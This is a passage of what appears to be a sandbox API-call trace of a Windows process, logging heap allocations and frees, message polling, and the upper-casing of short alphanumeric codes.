HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0163.541] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0163.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0163.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0163.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0163.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0163.542] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0163.542] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0163.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0163.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0163.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.543] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0163.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0163.544] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0163.544] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.544] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0163.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0163.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0163.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.545] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.545] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0163.545] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0163.545] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0163.545] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0163.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0163.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.546] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0163.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.546] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0163.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0163.547] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0163.547] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.548] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0163.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0163.549] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0163.549] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0163.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0163.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.549] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0163.550] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0163.550] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0163.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0163.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0163.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0163.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0163.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0163.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0163.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0163.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0163.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0163.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0163.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0163.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0163.617] 